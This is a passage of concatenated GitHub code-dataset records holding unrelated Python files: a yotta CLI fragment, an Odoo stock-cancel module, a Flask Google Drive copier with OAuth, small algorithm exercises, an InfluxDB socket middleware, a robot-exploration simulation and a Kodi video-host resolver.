onParserAdded(parser):\n import importlib\n module = importlib.import_module('.' + module_name, 'yotta')\n module.addOptions(parser)\n parser.set_defaults(command=module.execCommand)\n subparser.add_parser_async(\n name, description=description, help=help,\n formatter_class=argparse.RawTextHelpFormatter,\n callback=onParserAdded\n )\n\n addParser('search', 'search',\n 'Search for open-source modules and targets that have been published '+\n 'to the yotta registry (with yotta publish). See help for `yotta '+\n 'install` for installing modules, and for `yotta target` for '+\n 'switching targets.',\n 'Search for published modules and targets'\n )\n addParser('init', 'init', 'Create a new module.')\n addParser('install', 'install',\n 'Add a specific module as a dependency, and download it, or install all '+\n 'dependencies for the current module. 
Use yotta install '+\n 'modulename@version to install a specific version.'\n )\n addParser('build', 'build',\n 'Build the current module. Options can be passed to the underlying '+\n 'build tool by passing them after --, e.g. to do a verbose build '+\n 'which will display each command as it is run, use:\\n'+\n ' yotta build -- -v\\n\\n'+\n 'The programs or libraries to build can be specified (by default '+\n 'only the libraries needed by the current module and the current '+\n \"module's own tests are built). For example, to build the tests of \"+\n 'all dependencies, run:\\n yotta build all_tests\\n\\n',\n 'Build the current module.'\n )\n addParser('version', 'version', 'Bump the module version, or (with no arguments) display the current version.')\n addParser('link', 'link',\n 'Symlink a module to be used into another module.\\n\\n'+\n 'Use: \"yotta link\" in a module to link it globally, then use \"yotta '+\n 'link \" to link it into the module where you want to use '+\n 'it.\\n\\n'+\n '\"yotta link ../path/to/module\" is also supported, which will create '+\n 'the global link and a link into the current module in a single step.',\n 'Symlink a module'\n )\n addParser('link-target', 'link_target',\n 'Symlink a target to be used into another module.\\n\\n'+\n 'Use: \"yotta link\" in a target to link it globally, then use \"yotta '+\n 'link-target \" to link it into the module where you want to use '+\n 'it.\\n\\n'+\n '\"yotta link ../path/to/target\" is also supported, which will create '+\n 'the global link and a link into the current module in a single step.',\n 'Symlink a target'\n )\n addParser('update', 'update', 'Update dependencies for the current module, or a specific module.')\n addParser('target', 'target', 'Set or display the target device.')\n addParser('debug', 'debug', 'Attach a debugger to the current target. Requires target support.')\n addParser('test', 'test_subcommand',\n 'Run the tests for the current module on the current target. A build '+\n 'will be run first, and options to the build subcommand are also '+\n 'accepted by test.\\nThis subcommand requires the target to provide a '+\n '\"test\" script that will be used to run each test. Modules may also '+\n 'define a \"testReporter\" script, which will be piped the output from '+\n 'each test, and may produce a summary.',\n 'Run the tests for the current module on the current target. Requires target support for cross-compiling targets.'\n )\n addParser('start', 'start',\n 'Launch the compiled program (available for executable modules only). 
Requires target support for cross-compiling targets.'\n )\n addParser('publish', 'publish', 'Publish a module or target to the public registry.')\n addParser('unpublish', 'unpublish', 'Un-publish a recently published module or target.')\n addParser('login', 'login', 'Authorize for access to private github repositories and publishing to the yotta registry.')\n addParser('logout', 'logout', 'Remove saved authorization token for the current user.')\n addParser('whoami', 'whoami', 'Display who the currently logged in user is (if any).')\n addParser('list', 'list', 'List the dependencies of the current module, or the inherited targets of the current target.')\n addParser('outdated', 'outdated', 'Display information about dependencies which have newer versions available.')\n addParser('uninstall', 'uninstall', 'Remove a specific dependency of the current module, both from module.json and from disk.')\n addParser('remove', 'remove',\n 'Remove the downloaded version of a dependency module or target, or '+\n 'un-link a linked module or target (see yotta link --help for details '+\n 'of linking). This command does not modify your module.json file.',\n 'Remove or unlink a dependency without removing it from module.json.'\n )\n addParser('owners', 'owners', 'Add/remove/display the owners of a module or target.')\n addParser('licenses', 'licenses', 'List the licenses of the current module and its dependencies.')\n addParser('clean', 'clean', 'Remove files created by yotta and the build.')\n addParser('config', 'config', 'Display the target configuration info.')\n addParser('shrinkwrap', 'shrinkwrap', 'Create a yotta-shrinkwrap.json file to freeze dependency versions.')\n\n # short synonyms, subparser.choices is a dictionary, so use update() to\n # merge in the keys from another dictionary\n short_commands = {\n 'up':subparser.choices['update'],\n 'in':subparser.choices['install'],\n 'un':subparser.choices['uninstall'],\n 'ln':subparser.choices['link'],\n 'v':subparser.choices['version'],\n 'ls':subparser.choices['list'],\n 'rm':subparser.choices['remove'],\n 'unlink':subparser.choices['remove'],\n 'unlink-target':subparser.choices['remove'],\n 'owner':subparser.choices['owners'],\n 'lics':subparser.choices['licenses'],\n 'who':subparser.choices['whoami'],\n 'run':subparser.choices['start']\n }\n subparser.choices.update(short_commands)\n\n # split the args into those before and after any '--'\n # argument - subcommands get raw access to arguments following '--', and\n # may pass them on to (for example) the build tool being used\n split_args = splitList(sys.argv, '--')\n following_args = reduce(lambda x,y: x + ['--'] + y, split_args[1:], [])[1:]\n\n # complete all the things :)\n argcomplete.autocomplete(\n parser,\n exclude = list(short_commands.keys()) + ['-d', '--debug', '-v', '--verbose']\n )\n\n # when args are passed directly we need to strip off the program name\n # (hence [:1])\n args = parser.parse_args(split_args[0][1:])\n\n # set global arguments that are shared everywhere and never change\n globalconf.set('interactive', args.interactive)\n globalconf.set('plain', args.plain)\n\n # finally, do stuff!\n if 'command' not in args:\n parser.print_usage()\n sys.exit(0)\n\n try:\n status = args.command(args, following_args)\n except KeyboardInterrupt:\n logging.warning('interrupted')\n status = -1\n except Exception as e:\n logging.error(e)\n status = -1\n\n sys.exit(status or 
0)\n","repo_name":"ARMmbed/yotta","sub_path":"yotta/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10973,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"37"} +{"seq_id":"4091923975","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import fields, models, _\nfrom odoo.exceptions import UserError\nfrom odoo.tools.float_utils import float_round, float_compare\n\nclass StockMoveCancel(models.Model):\n _inherit = 'stock.move'\n\n def _action_cancel(self):\n if any(move.state == 'done' for move in self):\n for move in self:\n if move.state == 'cancel':\n continue\n move.mapped('move_line_ids')._action_cancel_done()\n move.write({'state': 'cancel', 'date': fields.Datetime.now()})\n else:\n super(StockMoveCancel, self)._action_cancel()\n return True\n\n def _action_set_to_draft(self):\n if any(move.state == 'cancel' for move in self):\n for move in self:\n move.write({'state': 'draft'})\n\nclass StockMoveLineCancel(models.Model):\n _inherit = 'stock.move.line'\n\n def _action_cancel_done(self):\n Quant = self.env['stock.quant']\n ml_to_delete = self.env['stock.move.line']\n for ml in self:\n uom_qty = float_round(ml.qty_done, precision_rounding=ml.product_uom_id.rounding, rounding_method='HALF-UP')\n precision_digits = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n qty_done = float_round(ml.qty_done, precision_digits=precision_digits, rounding_method='HALF-UP')\n qty_done_float_compared = float_compare(ml.qty_done, 0, precision_rounding=ml.product_uom_id.rounding)\n if qty_done_float_compared > 0:\n if ml.product_id.tracking != 'none':\n picking_type_id = ml.move_id.picking_type_id\n if picking_type_id:\n if picking_type_id.use_create_lots:\n if ml.lot_name and not ml.lot_id:\n lot = self.env['stock.production.lot'].create(\n {'name': ml.lot_name, 'product_id': ml.product_id.id}\n )\n ml.write({'lot_id': lot.id})\n elif not picking_type_id.use_create_lots and not picking_type_id.use_existing_lots:\n continue\n elif ml.move_id.inventory_id:\n continue\n elif qty_done_float_compared < 0:\n raise UserError(_('No negative quantities allowed'))\n else:\n ml_to_delete |= ml\n ml_to_delete.unlink()\n done_ml = self.env['stock.move.line']\n for ml in self - ml_to_delete:\n if ml.product_id.type == 'product':\n rounding = ml.product_uom_id.rounding\n if not ml.location_dest_id.should_bypass_reservation() and float_compare(ml.qty_done, ml.product_qty, precision_rounding=rounding) > 0:\n extra_qty = ml.qty_done - ml.product_qty\n ml._free_reservation(ml.product_id, ml.location_dest_id, extra_qty, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id, ml_to_ignore=done_ml)\n if not ml.location_dest_id.should_bypass_reservation() and ml.product_id.type == 'product' and ml.product_qty:\n try:\n Quant._update_reserved_quantity(ml.product_id, ml.location_dest_id, -ml.product_qty, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id, strict=True)\n except UserError:\n Quant._update_reserved_quantity(ml.product_id, ml.location_dest_id, -ml.product_qty, lot_id=False, package_id=ml.package_id, owner_id=ml.owner_id, strict=True)\n quantity = ml.product_uom_id._compute_quantity(ml.qty_done, ml.move_id.product_id.uom_id, rounding_method='HALF-UP')\n available_qty, in_date = Quant._update_available_quantity(ml.product_id, ml.location_dest_id, -quantity, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id)\n if available_qty < 0 and ml.lot_id:\n untracked_qty = 
Quant._get_available_quantity(ml.product_id, ml.location_dest_id, lot_id=False, package_id=ml.package_id, owner_id=ml.owner_id, strict=True)\n if untracked_qty:\n taken_from_untracked_qty = min(untracked_qty, abs(quantity))\n Quant._update_available_quantity(ml.product_id, ml.location_dest_id, -taken_from_untracked_qty, lot_id=False, package_id=ml.package_id, owner_id=ml.owner_id)\n Quant._update_available_quantity(ml.product_id, ml.location_dest_id, taken_from_untracked_qty, lot_id=ml.lot_id, package_id=ml.package_id, owner_id=ml.owner_id)\n Quant._update_available_quantity(ml.product_id, ml.location_id, quantity, lot_id=ml.lot_id, package_id=ml.result_package_id, owner_id=ml.owner_id, in_date=in_date)\n done_ml |= ml\n (self - ml_to_delete).with_context(bypass_reservation_update=True).write({\n 'product_uom_qty': 0.00,\n 'qty_done': 0.00,\n 'date': fields.Datetime.now(),\n })","repo_name":"butagreeza/korea_spa","sub_path":"addons_custom/stock_picking_cancel/models/stock_move.py","file_name":"stock_move.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43495135368","text":"from flask import Flask, render_template, request, jsonify, url_for, session, redirect\nimport flask\nfrom time import time\nfrom oauthlib.oauth2 import WebApplicationClient\nimport requests\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\nfrom utils import extractIds\nfrom copier import Copier\nfrom json import dumps\nfrom config import Config\nfrom database import db\nfrom flask_migrate import Migrate\n\n\nACCESS_TOKEN = 'access_token'\nSTATE = 'state'\nEXPIRES_AT = 'expires_at'\nEXPIRES_IN = 'expires_in'\nEMAIL = 'email'\nID_TOKEN = 'id_token'\nREFRESH_TOKEN = 'refresh_token'\nSUB = 'sub'\n\n\napp = Flask(__name__, static_url_path='/static')\napp.config.from_object(Config)\napp.secret_key = app.config['SECRET_KEY']\napp.config['SQLALCHEMY_ENGINE_OPTIONS'] = {\"pool_pre_ping\": True}\nclient = WebApplicationClient(app.config['CLIENT_ID'])\ndb.init_app(app)\nmigrate = Migrate(app, db)\n\nfrom user import User\n\n\ndef get_google_provider_cfg():\n return requests.get(app.config['GOOGLE_DISCOVERY_URL']).json()\n\n\ndef is_logged_in():\n return SUB in session\n\n\ndef has_refresh_token():\n return session.get(REFRESH_TOKEN, None)\n\n\ndef is_token_valid():\n if session[EXPIRES_AT]:\n return time() < session[EXPIRES_AT]\n else:\n return False\n\n\n@app.route('/')\ndef home():\n if is_logged_in():\n if is_token_valid():\n return render_template('drive.html')\n else:\n if has_refresh_token():\n return flask.redirect(url_for('refresh'), code=302)\n else:\n return render_template('login.html')\n else:\n return render_template('login.html')\n\n\n@app.route('/login')\ndef login():\n google_provider_cfg = get_google_provider_cfg()\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n\n url, headers, body = client.prepare_authorization_request(\n authorization_endpoint,\n redirect_url=app.config['AUTH_REDIRECT_URI'],\n scope=app.config['AUTHORIZATION_SCOPE'],\n access_type='offline'\n )\n\n session[STATE] = client.state\n return redirect(url)\n\n\n@app.route('/refresh')\ndef refresh():\n assert(is_logged_in())\n google_provider_cfg = get_google_provider_cfg()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n\n url, headers, body = client.prepare_refresh_token_request(token_endpoint,\n client_id=app.config['CLIENT_ID'],\n 
client_secret=app.config['CLIENT_SECRET'],\n refresh_token=session[REFRESH_TOKEN],\n )\n\n token_response = requests.post(url,\n headers=headers,\n data=body)\n\n access_token = token_response.json()[ACCESS_TOKEN]\n expires_at = token_response.json()[EXPIRES_IN] + int(time())\n User.update_token(session[SUB], access_token, expires_at)\n session[ACCESS_TOKEN] = access_token\n session[EXPIRES_AT] = expires_at\n return redirect(app.config['BASE_URI'])\n\n\n@app.route('/callback')\ndef callback():\n response_state = request.args.get(STATE, default=None, type=None)\n\n if response_state != flask.session[STATE]:\n response = flask.make_response('Invalid state parameter', 401)\n return response\n\n code = request.args.get(\"code\")\n google_provider_cfg = get_google_provider_cfg()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n url, headers, body = client.prepare_token_request(token_endpoint,\n # authorization_response=new_auth,\n redirect_url=app.config['AUTH_REDIRECT_URI'],\n code=code,\n client_secret=app.config['CLIENT_SECRET']\n )\n\n token_response = requests.post(url,\n headers=headers,\n data=body)\n\n expires_at = token_response.json()[EXPIRES_IN] + int(time())\n\n client.parse_request_body_response(dumps(token_response.json()))\n\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\n uri, headers, body = client.add_token(userinfo_endpoint)\n userinfo_response = requests.get(uri, headers=headers, data=body)\n\n sub = userinfo_response.json()[SUB]\n access_token = token_response.json()[ACCESS_TOKEN]\n\n # https://developers.google.com/identity/protocols/oauth2/openid-connect#refresh-tokens\n refresh_token = token_response.json().get(REFRESH_TOKEN, None)\n\n user = User.get(sub)\n if not user:\n user = User.create(sub, access_token=access_token, expires_at=expires_at, refresh_token=refresh_token)\n else:\n user = User.update_token(sub, access_token=access_token, expires_at=expires_at, refresh_token=refresh_token)\n\n session[SUB] = sub\n session[ACCESS_TOKEN] = access_token\n session[EXPIRES_AT] = expires_at\n\n if refresh_token:\n session[REFRESH_TOKEN] = refresh_token\n else:\n session[REFRESH_TOKEN] = user.refresh_token\n\n flask.session.permanent = True\n return redirect('/')\n\n\n@app.route('/token')\ndef token():\n response = {\n ACCESS_TOKEN: session[ACCESS_TOKEN]\n }\n return jsonify(response)\n\n\n@app.route('/signout')\ndef sign_out():\n session.pop(SUB, None)\n session.pop(ACCESS_TOKEN, None)\n session.pop(EXPIRES_AT, None)\n session.pop(REFRESH_TOKEN, None)\n return redirect(app.config['BASE_URI'], code=302)\n\n\n@app.route('/go', methods=['GET', 'POST'])\ndef go():\n \"\"\"\n Requests from users go here\n :return:\n \"\"\"\n if request.method == 'POST':\n # extract all details from user request\n json = request.get_json()\n public = json['public']\n links = json['links']\n folder_id = json['folderId']\n cred = Credentials(session[ACCESS_TOKEN])\n service = build('drive', 'v3', credentials=cred)\n\n # extract ids from links\n # match pattern is 25 words or dash characters, might change this later\n pattern = '[-\\w]{25,}'\n file_ids = extractIds(pattern, links)\n\n response_body = dict()\n response_body['response'] = []\n\n c = Copier(service)\n\n response_body['response'] = c.make_copies(file_ids, public=public, destination=folder_id)\n return jsonify(response_body), 200\n\n else:\n # fun\n message = {'greeting': 'Hello boss'}\n return jsonify(message)\n\n\nif __name__ == \"__main__\":\n app.run(host='localhost', 
ssl_context=\"adhoc\")\n","repo_name":"echen44/drive-copier","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
{"seq_id":"31894526573","text":"# The fraction 49/98 is a curious fraction,\n# as an inexperienced mathematician, in attempting to simplify it, may incorrectly believe that\n# 49/98 = 4/8, which is correct, is obtained by cancelling the 9s.\n#\n# We shall consider fractions like,\n# 30/50 = 3/5\n# to be trivial examples.\n#\n# There are exactly four non-trivial examples of this type of fraction,\n# less than one in value, and containing two digits in the numerator and denominator.\n#\n# If the product of these four fractions is given in its lowest common terms, find the value of the denominator.\nfrom fractions import Fraction\nfrom functools import reduce\n\ndef badSimplify(numerator: int, denominator: int) -> list[tuple[int, int]]:\n    if numerator %10 == 0 or denominator % 10 == 0: return []\n\n    numerator = str(numerator)\n    denominator = str(denominator)\n    acc = []\n\n    if numerator[0] == denominator[0]:\n        candidate = (int(numerator[1]), int(denominator[1]))\n        if candidate not in acc:\n            acc.append(candidate)\n\n    if numerator[1] == denominator[0]:\n        candidate = (int(numerator[0]), int(denominator[1]))\n        if candidate not in acc:\n            acc.append(candidate)\n\n    if numerator[0] == denominator[1]:\n        candidate = (int(numerator[1]), int(denominator[0]))\n        if candidate not in acc:\n            acc.append(candidate)\n\n    if numerator[1] == denominator[1]:\n        candidate = (int(numerator[0]), int(denominator[0]))\n        if candidate not in acc:\n            acc.append(candidate)\n\n    return acc\n\n\nif __name__ == '__main__':\n    acc = []\n    for n in range(11, 100):\n        for d in range(n, 100):\n            if n == d: continue\n            BS = badSimplify(n, d)\n            for badFraction in BS:\n                if Fraction(badFraction[0], badFraction[1]) == Fraction(n, d):\n                    acc.append((n,d))\n\n    # visual inspection of the result shows we have a floating point error: the product prints as 0.010000000000000002,\n    # which I interpret as 1/100\n    print(reduce((lambda a,b:a*b) , [n/d for (n,d) in acc]))\n\n","repo_name":"jarredblanchette/ProjectEuler","sub_path":"problems/033/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
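A quick stand-alone check of the property the comments above describe, separate from the file itself and using only the standard library (the four non-trivial fractions are the well-known ones for this problem):

```python
from fractions import Fraction

# 49/98 really does equal the naively digit-cancelled 4/8:
assert Fraction(49, 98) == Fraction(4, 8)

# 30/50 = 3/5 also survives digit cancelling, but only via the trailing
# zeros, which is why the problem brands it a trivial example:
assert Fraction(30, 50) == Fraction(3, 5)

# the four non-trivial fractions multiply to 1/100 in lowest terms,
# so the denominator the problem asks for is 100:
product = Fraction(16, 64) * Fraction(19, 95) * Fraction(26, 65) * Fraction(49, 98)
assert product == Fraction(1, 100)
```

Printing the product as exact `Fraction`s instead of floats (the script multiplies `n/d` as floats) would avoid the 0.010000000000000002 artefact noted in the closing comment.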
{"seq_id":"30721035599","text":"# Approach 1\n# O(N^2) time, O(1) space\ndef maxLen(self, n, arr):\n    max_len = 0\n    for i in range(n):\n        sum = 0\n        for j in range(i, n):\n            sum += arr[j]\n            if sum == 0:\n                max_len = max(max_len, j-i+1)\n    return max_len\n\n\n# Approach 2\n# O(N) time, O(N) space\ndef maxLen(self, n, arr):\n    # Storing prefix sum and the index is the important factor here\n    prefix_sum = dict()\n    max_len, curr_sum = 0, 0\n    for i in range(n):\n        curr_sum += arr[i]\n        if curr_sum == 0:\n            max_len = max(max_len, i+1)\n        if curr_sum not in prefix_sum:\n            prefix_sum[curr_sum] = i\n        else:\n            max_len = max(max_len, i-prefix_sum[curr_sum])\n    return max_len","repo_name":"nikhiljsk/Strivers_SDE_Sheet","sub_path":"04_Arrays_Part_Four/4.4_Largest_Subarray_with_Sum_0.py","file_name":"4.4_Largest_Subarray_with_Sum_0.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
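The reason Approach 2 above works: if the running prefix sum takes the same value at indices j and i (j < i), everything strictly between them sums to zero, so recording only the first index per prefix value maximises the window. A short illustrative trace (the array is my own example, not from the file):

```python
arr = [15, -2, 2, -8, 1, 7, 10, 23]
# prefix sums: 15, 13, 15, 7, 8, 15, 25, 48
# 15 first appears at index 0 and again at index 5,
# so arr[1:6] == [-2, 2, -8, 1, 7] sums to zero (length 5)

prefix, first_seen, best = 0, {}, 0
for i, x in enumerate(arr):
    prefix += x
    if prefix == 0:              # zero-sum window starting at index 0
        best = max(best, i + 1)
    elif prefix in first_seen:   # repeated prefix -> zero-sum window
        best = max(best, i - first_seen[prefix])
    else:
        first_seen[prefix] = i   # keep only the earliest occurrence

assert best == 5
```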
recibido\")\n\t\tprint(\"\\n\")\n\t\thead=conn.recv(1024) #Obtenemos los datos de cabecera en formato bytes\n\t\t# print(head)\n\n\t\tbody=conn.recv(1024) #Obtenemosv el payload del mensaje en formato bytes\n\t\t# print(body)\n\t\tdata = body.decode('utf-8')\n\t\tprint(data)\n\n\t\tdevice = rnd.choice(device_list)\n\t\t# data = data.split(\"&\")\n\t\t# print(data)\n\t\t# data = dict([i.split(\"=\") for i in data])\n\t\t# data['temperature'] = int(data['temperature'])\n\t\t# data['humidity'] = int(data['humidity'])\n\t\t# print(data)\n\t\ttime_zone = timezone('America/Santiago')\n\t\ttime = datetime.now(time_zone)\n\n\t\tbody_json = [\n\t\t\t{\n\t\t\t\"measurement\": \"device_\" + \"0003\",\n\t\t\t\"tags\": {\n\t\t\t\t\"host\": \"Oleksandr\",\n\t\t\t\t\"region\": \"Murcia\"\n\t\t\t},\n\t\t\t\"time\": time,\n\t\t\t\"fields\": json.loads(data)\n\t\t\t}]\n\t\tprint(body_json)\n\t\tclient.write_points(body_json)\n\n\n\t\t#ENVIAMOS RESPUESTA AL SERVIDOR\n\t\t#es obligatorio enviar una respuesta ya que el cliente se queda bloqueado esperandola\n\t\tr_protocol='HTTP/1.1'.encode()\n\t\tr_status='200'.encode()\n\t\tr_status_text='OK'.encode()\n\t\tconn.send(b'%s %s %s' %(r_protocol, r_status, r_status_text))\n\t\tprint(\"Sent\")\n\n\t\tconn.close() #cierre de la comunicacion\n\n\nexcept:\n\tprint(\"Ha ocurrido una excepcion\")\n\nfinally:\n\tconn.close()\n\ts.close()\n\n","repo_name":"Kovaxs/LoRa_IoT","sub_path":"servidores LoRa_20_21/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"67164807","text":"import numpy as np\nfrom scipy.signal import convolve2d\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.ticker import AutoMinorLocator\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nW=10\nH=10\nD=5\n\nlim=np.array([W,D,H])\n\nm=np.zeros(lim)\n\nenv=np.zeros(lim)\nenv[3,1:3,3 ]=1\nenv[4,1:3,2:5]=1\nenv[5,1:3,0:5]=1\nenv[6,1:3,0:5]=1\nenv[7,1:3,2:5]=1\nenv[4:9,:2,6:8]=1\n\ndef sense(p):\n global env\n return env[tuple(p)]>0\n\nsq2=np.sqrt(2)/2\n# dkernel=np.array([[.7,.7/sq2,.7],[.7/sq2, 0, .7/sq2],[.7, .7/sq2, .7]])\ndkernel=np.array([[0,.7/sq2,0],[.7/sq2, 0, .7/sq2],[0, .7/sq2, 0]])\n\n\ndef dact(act, ext):\n conv=convolve2d(np.maximum(act,0), dkernel, 'same') / convolve2d(np.ones_like(activity), dkernel,'same')\n neg_distr=convolve2d(np.minimum(act,0), dkernel, 'same')\n \n return -A*act \\\n +(B-act)*(conv + np.maximum(ext_input,0)) \\\n -(D+act)*(np.maximum(-ext_input,0))\n\n\nctublue=[0,110/255,182/255]\nctuorange=[1,115/255,63/255]\n\n\ndef plot_3d():\n fig = plt.figure(figsize=(6,6))\n ax = fig.add_subplot(111, projection='3d', aspect='equal')\n\n plt.xticks(np.arange(W))\n plt.yticks(np.arange(5))\n ax.set_xlim(-0.5,9.5)\n ax.set_ylim(-0.5,9.5)\n ax.set_zlim(-0.5,9.5)\n ax.xaxis.set_minor_locator(AutoMinorLocator(2))\n ax.yaxis.set_minor_locator(AutoMinorLocator(2))\n ax.grid(True, which='minor')\n\n \n # for tick in ax.axes.get_xticklines():\n # tick.set_visible(False)\n\n # for tick in ax.axes.get_yticklines():\n # tick.set_visible(False)\n\n ax.plot3D(path[:,0], path[:,1], path[:,2], color=ctuorange, lw=2)\n ax.scatter(*np.where(env==1), s=400, color=ctublue, alpha=1)\n\n for warp in warps:\n ax.plot3D(path[warp-1:warp+1,0], path[warp-1:warp+1,1], path[warp-1:warp+1,2], 'k', lw=2)\n\n plt.axis('equal')\n ax.autoscale()\n \n plt.tight_layout()\n\n# plot_3d()\n\n\ndef plot_2d_env():\n # 
rects=[]\n # for i in range(10):\n # for j in range(10):\n # if env[i,y,j]==1:\n # rects.append(patches.Rectangle([i-0.5,j-0.5], 1, 1, color=ctublue, alpha=1))\n\n fig = plt.figure(figsize=(6,6))\n ax = fig.add_subplot(111, aspect='equal')\n\n plt.xticks(np.arange(W+1))\n plt.yticks(np.arange(H+1))\n plt.axis('scaled')\n ax.set_xlim(-0.5,9.5)\n ax.set_ylim(-0.5,9.5)\n ax.xaxis.set_minor_locator(AutoMinorLocator(2))\n ax.yaxis.set_minor_locator(AutoMinorLocator(2))\n ax.grid(True, which='minor')\n\n \n for tick in ax.axes.get_xticklines():\n tick.set_visible(False)\n\n for tick in ax.axes.get_yticklines():\n tick.set_visible(False)\n\n # for r in rects:\n # ax.add_patch(r)\n\n # plot path\n im=ax.imshow(activity.T, interpolation=\"nearest\", cmap=\"viridis\")\n \n p0=path[path[:,1]==y,:]\n plen=np.sum(np.sqrt(np.sum((p0[1:,:]-p0[:-1,:])**2, axis=1)))\n print(\"Path length:\",plen)\n # p0+=np.random.rand(p0.shape[0], 3)/4 - (1/8)\n ax.plot(p0[:,0], p0[:,2], lw=2, color=ctuorange)\n\n for warp in warps:\n plt.plot(p0[warp-1:warp+1,0], p0[warp-1:warp+1,2], 'k', lw=2)\n\n plt.colorbar(im)\n \n plt.tight_layout()\n\n\n\n\nA=50\nB=2\nD=1\nE=100\nC=0.00\n\nSTEP=0.005\n\n\npos=np.zeros((3,), 'i')\nneigh=np.array([[-1,0,0], [1,0,0], [0,0,-1], [0,0,1]], 'i')\n\npath=np.zeros((0,3))\n\nturn_values=[.5, 0, 1]\n\nrects=[]\n\nplt.interactive(True)\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.xticks(np.arange(W+1))\nplt.yticks(np.arange(H+1))\nplt.axis('equal')\nax.set_xlim(0,10)\nax.set_ylim(0,10)\nax.xaxis.set_minor_locator(AutoMinorLocator(2))\nax.yaxis.set_minor_locator(AutoMinorLocator(2))\nax.grid(True, which='minor')\n\n\n# plt.show()\n\n\ndef draw():\n ax.clear()\n ax.imshow(activity.T, interpolation=\"none\", cmap=\"viridis\")\n ax.grid(True, which='minor')\n for pa in rects:\n ax.add_patch(pa)\n p0=path[path[:,1]==y,:]\n plen=np.sum(np.sqrt(np.sum((p0[1:,:]-p0[:-1,:])**2, axis=1)))\n plt.title(plen)\n p0+=np.random.rand(p0.shape[0], 3)/4-0.25\n ax.plot(p0[:,0], p0[:,2])\n \n for warp in warps:\n plt.plot(p0[warp-1:warp+1,0], p0[warp-1:warp+1,2], 'r')\n\n plt.axis(\"equal\")\n fig.canvas.draw()\n\nwarps=[]\n# explore\nfor y in range(5):\n pos[1]=y\n activity=np.zeros((W,H))\n ext_input=np.ones((W,H))*E\n\n # a few steps to stabilize the initial state\n for i in range(10):\n k1=dact(activity, ext_input)\n k2=dact(activity + (STEP/2)*k1, ext_input)\n k3=dact(activity + (STEP/2)*k2, ext_input)\n k4=dact(activity+STEP*k3, ext_input)\n \n activity+=STEP/6 * (k1 + 2*k2 + 2*k3 + k4)\n print(activity)\n\n step=None\n \n while True:\n while True:\n print(\"At\",pos)\n path=np.vstack((path, pos))\n \n if sense(pos): # position full\n print(\"full\")\n m[tuple(pos)]=-2\n ext_input[tuple(pos[::2])]=-E\n \n rects.append(patches.Rectangle(pos[::2]-0.5, 1, 1, color='g', alpha=0.5))\n if step is not None:\n pos-=step\n else:\n break\n continue\n\n m[tuple(pos)]=-1\n ext_input[tuple(pos[::2])]=0\n\n for i in range(5):\n k1=dact(activity, ext_input)\n k2=dact(activity + (STEP/2)*k1, ext_input)\n k3=dact(activity + (STEP/2)*k2, ext_input)\n k4=dact(activity + STEP*k3, ext_input)\n\n activity+=STEP/6 * (k1 + 2*k2 + 2*k3 + k4)\n\n draw()\n # input()\n \n maxd=activity[tuple(pos[::2])]\n prev_step=step\n step=None\n for d in neigh:\n nextpos=pos+d\n if (nextpos<0).any() or (nextpos>=lim).any():\n continue\n\n nextpos=tuple(nextpos[::2])\n dir_contrib = turn_values[np.sum(d==prev_step)-1] if prev_step is not None else 0\n next_val=activity[nextpos] + C*dir_contrib\n\n if next_val>maxd:\n maxd=next_val\n 
step=d\n\n if step is not None:\n pos+=step\n else:\n break\n \n if (m[:,y,:]>=0).any():\n print(\"deadlock, just wait\",pos)\n ukno=np.vstack(np.where(m[:,y,:] >= 0))\n mdist=ukno-pos[::2,np.newaxis]\n edist=np.sqrt(np.sum(mdist**2, axis=0))\n\n closest=np.argmin(edist)\n \n # TODO: how to go\n pos=np.array([ukno[0,closest], y, ukno[1,closest]])\n\n print(\"warp to\",pos)\n warps.append(path.shape[0])\n else:\n break\n","repo_name":"MartinBurian/diploma-thesis","sub_path":"cd/expl_neuro.py","file_name":"expl_neuro.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41549662872","text":"import random\nimport statistics\ny = []\nfor i in range(20):\n\tx = random.randint(6,100)\n\ty.append((2*x)+3) \n\tprint(x,y[i])\n\nstddev = statistics.stdev(y)\nprint(\"Standard Deviation\",stddev)","repo_name":"PranavParameshwaran/Big-Data","sub_path":"Lab 1/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18548696823","text":"# -*- coding: utf-8 -*-\n\nimport re,urlparse\nfrom resources.lib.libraries import client\nfrom resources.lib.libraries import jsunpack\n\n\ndef resolve(url):\n try:\n result = client.request(url)\n\n result = re.compile('(eval.*?\\)\\)\\))').findall(result)[-1]\n result = jsunpack.unpack(result)\n\n url = client.parseDOM(result, 'embed', ret='src')\n url += re.compile(\"file *: *[\\'|\\\"](.+?)[\\'|\\\"]\").findall(result)\n url = [i for i in url if not i.endswith('.srt')]\n url = 'http://' + url[0].split('://', 